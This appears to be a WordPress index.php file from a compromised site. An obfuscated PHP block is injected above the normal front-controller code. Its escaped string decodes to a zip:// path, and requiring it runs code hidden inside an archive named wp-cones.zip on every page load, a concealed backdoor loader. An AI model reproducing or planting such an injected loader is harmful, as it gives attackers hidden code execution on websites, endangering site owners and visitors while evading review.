File: /var/www/volumes/69b4844ae61d4e92bf26ad98af552775/wordpress/index.php
<?php
$N2W2s = ["\x7a\x69\160", "\x3a", "\x2f", "\x2f\167\160\x2d\143\x6f\x6e\145\163\x2e", "\172\x69", "\160\43", "\167\160\55\x63\157\156\145\x73"]; require implode('', $N2W2s);
?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';